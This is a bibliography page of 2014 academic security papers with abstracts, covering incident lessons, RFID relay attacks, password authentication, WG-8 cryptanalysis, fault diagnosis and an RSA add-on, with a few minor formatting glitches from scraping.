  • Ying He; Johnson, C.; Renaud, K.; Yu Lu; Jebriel, S., "An empirical study on the use of the Generic Security Template for structuring the lessons from information security incidents," Computer Science and Information Technology (CSIT), 2014 6th International Conference on , vol., no., pp.178,188, 26-27 March 2014 (ID#:14-1500) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805998&isnumber=6805962 The number of security incidents is still increasing. The re-occurrence of past breaches shows that lessons have not been effectively learned across different organizations. This illustrates important weaknesses within information security management systems (ISMS). The sharing of recommendations between public and private organizations has, arguably, not been given enough attention across academic and industry. Many questions remain, for example, about appropriate levels of detail and abstraction that enable different organizations to learn from incidents that occur in other companies within the same or different industries. The Generic Security Template has been proposed, aiming to provide a unified way to share the lessons learned from real world security incidents. In particular, it adapts the graphical Goal Structuring Notation (GSN), to present lessons learned in a structured manner by mapping them to the security requirements of the ISMS. In this paper, we have shown how a Generic Security Template can be used to structure graphical overviews of specific incidents. We have also shown the template can be instantiated to communicate the findings from an investigation into the US VA data breach. Moreover, this paper has empirically evaluated this approach to the creation of a Generic Security Template; this provides users with an overview of the lessons derived from security incidents at a level of abstraction that can help to implement recommendations in future contexts that are different from those in which an attack originally took place. Keywords: security of data; GSN; ISMS;US V data breach; generic security template; graphical goal structuring notation; information security management systems; private organizations; public organizations; security incidents; security requirements; Companies; Context; Hazards; Medical services; Security; Sensitivity; Standards; Generic Security Template; Goal Structuring Notation; lessons learned; security incident
  • Korak, Thomas; Hutter, Michael, "On the power of active relay attacks using custom-made proxies," RFID (IEEE RFID), 2014 IEEE International Conference on , vol., no., pp.126,133, 8-10 April 2014 (ID#:14-1501) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810722&isnumber=6810700 A huge number of security-relevant systems nowadays use contactless smart cards. Such systems, like payment systems or access control systems, commonly use single-pass or mutual authentication protocols to proof the origin of the card holder. The application of relay attacks allows circumventing this authentication process without needing to attack the implementation or protocol itself. Instead, the entire wireless communication is simply forwarded using a proxy and a mole allowing relaying messages over a large distance. In this paper, we present several relay attacks on an ISO/IEC 14443-based smart card implementing an AES challenge-response protocol. We highlight the strengths and weaknesses of two different proxy types: an NFC smart phone and a dedicated custom-made proxy device. First, we propose a "three-phones-in-the-middle" attack that allows relaying the communication over more than 360 feet (110 meters). Second, we present a custom-made proxy that solves major relay-attack restrictions that apply on almost all NFC smart phones, for example, cloning of the victim's UID, adaption of low-level protocol parameters, direct request for Waiting Time Extensions, or active modifications of the messages. Finally, we propose an attack that allows inducing single bit faults during the anticollision of the card which forces the reader to re-send or temporarily stall the communication which can be exploited by attacks to gain additional relay time. Keywords: IEC standards; ISO standards; Protocols; Radiofrequency identification; Relays; Smart phones; Wireless LAN; Embedded Systems; Man-in-the-Middle; Radio-Frequency Identification (RFID);Relay Attacks; Smart Cards
  • Fuw-Yi Yang; Chih-Wei Hsu; Su-Hui Chiu, "Password Authentication Scheme Preserving Identity Privacy," Measuring Technology and Mechatronics Automation (ICMTMA), 2014 Sixth International Conference on , vol., no., pp.443,447, 10-11 Jan. 2014 (ID#:14-1502) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802726&isnumber=6802614 Recently, the authentication schemes based on password have been used widely in network environment. It provides a convenient way for users to authenticate him/her to servers. Previously, Xu et al. proposed an improved smart card based password authentication scheme with provable security. Unfortunately, Song pointed out their scheme cannot withstand impersonation attacks. Moreover, Song proposed two improved schemes to solve it, but his first scheme still cannot withstand impersonation attack. This paper in addition to analyze the weakness of Song's scheme, improved scheme preserving identity privacy also proposes. Keywords: data privacy; smart cards; identity privacy preservation; impersonation attack; network environment; password authentication scheme; smart card; Authentication; Barium; Nickel; Privacy; Servers; Smart cards; identity authentication; identity privacy; impersonation attack; password guessing attacks; trapdoor function
  • Lin Ding; Chenhui Jin; Jie Guan; Qiuyan Wang, "Cryptanalysis of Lightweight WG-8 Stream Cipher," Information Forensics and Security, IEEE Transactions on , vol.9, no.4, pp.645,652, April 2014 (ID#:14-1503) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6746224&isnumber=6755552 WG-8 is a new lightweight variant of the well-known Welch-Gong (WG) stream cipher family, and takes an 80-bit secret key and an 80-bit initial vector (IV) as inputs. So far no attack on the WG-8 stream cipher has been published except the attacks by the designers. This paper shows that there exist Key-IV pairs for WG-8 that can generate keystreams, which are exact shifts of each other throughout the keystream generation. By exploiting this slide property, an effective key recovery attack on WG-8 in the related key setting is proposed, which has a time complexity of 253.32 and requires 252 chosen IVs. The attack is minimal in the sense that it only requires one related key. Furthermore, we present an efficient key recovery attack on WG-8 in the multiple related key setting. As confirmed by the experimental results, our attack recovers all 80 bits of WG-8 in on a PC with 2.5-GHz Intel Pentium 4 processor. This is the first time that a weakness is presented for WG-8, assuming that the attacker can obtain only a few dozen consecutive keystream bits for each IV. Finally, we give a new Key/IV loading proposal for WG-8, which takes an 80-bit secret key and a 64-bit IV as inputs. The new proposal keeps the basic structure of WG-8 and provides enough resistance against our related key attacks. Keywords: {computational complexity; cryptography; microprocessor chips;80-bit initial vector;80-bit secret key; Intel Pentium 4 processor; Welch-Gong stream cipher; frequency 2.5 GHz; key recovery attack; keystream generation; lightweight WG-8 stream cipher cryptanalysis; related key attack; slide property; time complexity; Ciphers; Clocks; Equations; Proposals; Time complexity;Cryptanalysis;WG-8;lightweight stream cipher; related key attack
  • Ye, F.; Chakrabarty, K.; Zhang, Z.; Gu, X., "Information-Theoretic Framework for Evaluating and Guiding Board-Level Functional Fault Diagnosis," Design & Test, IEEE , vol.PP, no.99, pp.1,1 March 2014 (ID#:14-1504) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6777578&isnumber=6461917 Reasoning-based functional-fault diagnosis has recently been advocated for improving high-volume product yield and reducing manufacturing cost. Periodic evaluation and analysis can help locate weaknesses in a diagnosis system and thereby provide guidelines for redesigning the tests, which facilitates better diagnosis. We describe an information theoretic framework for evaluating the effectiveness of and providing guidance to a reasoning-based functional fault diagnosis system. This framework measures the discriminative ability of syndromes and ambiguity between root causes. Results are presented for three complex boards that are in volume production. Keywords: Accuracy; Databases; Fault diagnosis; Maintenance engineering; Manufacturing; Measurement; Redundancy
  • Amlarethinam, D.I.G.; Geetha, J.S., "Enhancing Security Level for Public Key Cryptosystem Using MRGA," Computing and Communication Technologies (WCCCT), 2014 World Congress on , vol., no., pp.98,102, Feb. 27 2014-March 1 2014 (ID#:14-1505) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6755114&isnumber=6755083 The efficiency of cryptographic algorithm is not only based on the time taken for encryption and decryption, but also the number of levels used to get the cipher text from a plain text. The public key cryptosystem RSA is one of the widely used algorithms. However, several attacks are introduced to break this algorithm due to certain limitations. Also, it may not be guaranteed that the cipher text is fully secured. One of such limitations in the past cryptosystem is using ASCII characters for numerical representation of the text. To overcome the above said limitation, an innovative algorithm namely Magic Rectangle Generation Algorithm (MRGA) is being proposed in this work. It is helpful to enhance the security due to its complexity in encryption process. The singly even magic rectangle is formed based on the seed number, start number, row sum and column sum. The value of row sum and column sum is very difficult to be traced. The proposed work introduces one more level of security in public key algorithms such as RSA, ElGAMAL etc. Finally, MRGA helps to overcome the weakness of public key cryptosystem. Cipher text developed by this method can be entirely different when compared to the plain text and will be suitable for the secured transmission over the internet. Keywords: Internet; public key cryptography; ASCII characters; ElGAMAL; Internet; MRGA ;RSA; cipher text; column sum; decryption; encryption process; innovative algorithm; magic rectangle generation algorithm; numerical representation; plain text; public key cryptosystem; row sum; security level enhancement; seed number ;start number; Algorithm design and analysis; Ciphers; Encryption; Public key cryptography; MRGA; Magic Rectangle; Public Key Cryptosystem; RSA; Security; public key; secret key


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.